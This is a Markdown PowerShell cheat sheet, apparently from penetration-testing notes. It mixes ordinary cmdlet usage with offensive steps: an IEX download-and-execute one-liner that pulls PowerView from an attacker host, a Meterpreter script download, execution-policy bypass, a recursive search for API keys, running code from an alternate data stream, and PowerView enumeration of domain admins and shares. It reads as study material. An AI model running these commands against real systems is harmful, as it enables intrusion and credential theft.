327 lines
5.9 KiB
Markdown
327 lines
5.9 KiB
Markdown
# Powershell Usage
|
|
|
|
## Get-Help
|
|
```
|
|
Get-Help Command-Name
|
|
```
|
|
* Show examples
|
|
```
|
|
Get-Help Command-Name -Examples
|
|
```
|
|
|
|
* Get-Command gets all the cmdlets installed on the current Computer.
|
|
```
|
|
Get-Command
|
|
```
|
|
```
|
|
Get-Command Verb-*
|
|
Get-Command Invoke-*
|
|
Get-Command Get-*
|
|
```
|
|
|
|
## Passing Output via Pipe
|
|
* A pipe passes object including methods and attributes.
|
|
|
|
```
|
|
Verb-Noun | Get-Member
|
|
```
|
|
```
|
|
Get-Command | Get-Member -MemberType Method
|
|
```
|
|
|
|
## Creating Objects from Previous Cmdlets
|
|
```
|
|
Get-ChildItem | Select-Object -Property Mode, Name
|
|
```
|
|
* first - gets the first x object
|
|
* last - gets the last x object
|
|
* unique - shows the unique objects
|
|
* skip - skips x objects
|
|
|
|
## Filtering Objects
|
|
|
|
```
|
|
Verb-Noun | Where-Object -Property PropertyName -operator Value
|
|
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
|
|
```
|
|
|
|
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
|
|
* Where -operator is a list of the following operators:
|
|
|
|
* -Match: matches the exact value of the property
|
|
* -Contains: if any item in the property value is an exact match for the specified value
|
|
* -EQ: if the property value is the same as the specified value
|
|
* -GT: if the property value is greater than the specified value
|
|
|
|
### Out-Gridview
|
|
|
|
Pipe the output to a graphical window and Filter it through the GUI.
|
|
|
|
```
|
|
whatever | Out-GridView
|
|
```
|
|
|
|
## Sort Object
|
|
|
|
```
|
|
Verb-Noun | Sort-Object
|
|
```
|
|
|
|
```
|
|
Get-ChildItem | Sort-Object
|
|
```
|
|
|
|
## Finding a File
|
|
```
|
|
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
|
|
```
|
|
```sh
|
|
Get-HotFix | Format-list | findstr <searchstring>
|
|
```
|
|
```sh
|
|
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
|
|
```
|
|
* Find backup files
|
|
```sh
|
|
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
|
|
```
|
|
* Find file contents
|
|
```sh
|
|
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
|
|
```
|
|
|
|
## Showing File Content
|
|
```
|
|
Get-Content 'C:\Program Files\interesting-file.txt'
|
|
```
|
|
* Indexing lines
|
|
```sh
|
|
(Get-Content -Path file.txt)[index]
|
|
```
|
|
* Search
|
|
```sh
|
|
Select-String <filename> -Pattern <pattern>
|
|
```
|
|
|
|
## Copy File Content
|
|
```sh
|
|
Copy-Item <sourcefile> <destfile>
|
|
```
|
|
|
|
## Count Lines of Output
|
|
As an example, count all cmdlets on the system
|
|
```
|
|
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
|
|
```
|
|
|
|
## Count Words
|
|
```
|
|
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
|
|
```
|
|
|
|
## Checksum of File
|
|
```
|
|
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
|
|
```
|
|
|
|
## Current Working Directory
|
|
```
|
|
Get-Location
|
|
```
|
|
|
|
## File Metadata
|
|
```sh
|
|
ls | Format-List *
|
|
```
|
|
|
|
## Web Request
|
|
```sh
|
|
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
|
|
```
|
|
```sh
|
|
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
|
|
```
|
|
|
|
* Webrequest and execute in one go
|
|
```sh
|
|
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
|
|
```
|
|
|
|
## Base64 Decode File
|
|
```
|
|
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
|
|
```
|
|
|
|
## **Circumvent Execution-Policy**
|
|
```sh
|
|
powershell -ExecutionPolicy Bypass -File .\<file>
|
|
```
|
|
```sh
|
|
Set-ExecutionPolicy Bypass -Scope Process
|
|
```
|
|
|
|
## Enumeration
|
|
|
|
### Users
|
|
```
|
|
Get-LocalUser
|
|
```
|
|
|
|
* Password not required users
|
|
```
|
|
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
|
|
```
|
|
|
|
* SID of users
|
|
```
|
|
Get-WmiObject win32_useraccount | Select name, sid
|
|
```
|
|
|
|
### Network intel
|
|
* Connections
|
|
```sh
|
|
netstat -ano
|
|
```
|
|
* IP Address
|
|
```
|
|
Get-NetIpAddress
|
|
```
|
|
|
|
* Listening TCP Ports
|
|
```
|
|
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
|
|
```
|
|
|
|
* TCP Port by number
|
|
```
|
|
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
|
|
```
|
|
|
|
### Patch level and updates
|
|
```
|
|
Get-Hotfix
|
|
```
|
|
* Find patch by HotFixID
|
|
```
|
|
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
|
|
```
|
|
```sh
|
|
wmic qfe get Caption,Description,HotFixID,InstalledOn
|
|
```
|
|
|
|
### Drivers
|
|
```sh
|
|
driverquery
|
|
```
|
|
|
|
### Processes
|
|
* Start processes
|
|
```sh
|
|
Start-Process <process>
|
|
```
|
|
|
|
* Running processes
|
|
```sh
|
|
Get-Process <process>
|
|
```
|
|
### Scheduled tasks
|
|
```sh
|
|
schtasks /query /fo LIST /v
|
|
```
|
|
```sh
|
|
Get-ScheduledTaskInfo
|
|
```
|
|
* Scheduled Tasks, by TaskName
|
|
```
|
|
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
|
|
```
|
|
or
|
|
```
|
|
Get-ScheduledTask -TaskName taskname
|
|
```
|
|
|
|
### Alternate Data Stream(ADS)
|
|
* Show ADS
|
|
```sh
|
|
Get-Item -Path file.exe -Stream *
|
|
```
|
|
* Open ADS
|
|
```sh
|
|
wmic process call create $(Resolve-Path file.exe:streamname)
|
|
```
|
|
|
|
### Export Output
|
|
* Export as CSV
|
|
```sh
|
|
Get-Process <process> | Export-Csv <output.csv>
|
|
```
|
|
|
|
### ACL
|
|
* Owner of files
|
|
```
|
|
Get-ACL C:\
|
|
```
|
|
|
|
### Port Scanner
|
|
```
|
|
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
|
|
```
|
|
|
|
### Ping Hosts
|
|
```sh
|
|
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
|
|
```
|
|
|
|
### Antivirus
|
|
```sh
|
|
sc query windefend
|
|
```
|
|
* Service name unknown
|
|
```sh
|
|
sc queryex type=service
|
|
```
|
|
|
|
### Using Powerview
|
|
```sh
|
|
Import-Module .\powerview.ps1
|
|
Get-NetDomainController
|
|
(Get-NetUser).name
|
|
Get-NetUser -properties description
|
|
Get-NetUser | select -ExpandProperty lastlogon
|
|
Get-NetComputer -ping
|
|
Get-NetGroupMember "Domain Admins"
|
|
Find-DomainShare -CheckShareAccess
|
|
```
|
|
* Enumerate Group Policy
|
|
```sh
|
|
Get-NetGPO
|
|
```
|
|
* Trust relationship to other domains
|
|
```sh
|
|
Get-NetDomainTrust
|
|
```
|
|
* User enumeration
|
|
```sh
|
|
Find-LocalAdminAccess
|
|
```
|
|
```sh
|
|
whoami /priv
|
|
```
|
|
|
|
```
|
|
Import-Module ActiveDirectory
|
|
Get-ADGroup
|
|
Get-ADGroupMember
|
|
Get-ADPrincipalGroupMembership
|
|
```
|
|
|
|
### Services
|
|
|
|
List services that are running or stopped but always started automatically
|
|
after reboot in the following way.
|
|
|
|
```sh
|
|
Get-Service | Where-Object {$_.State -eq "Running" -and $_.StartType -eq "Automatic"}
|
|
Get-Service | Where-Object {$_.State -eq "Stopped" -and $_.StartType -eq "Automatic"}
|
|
```
|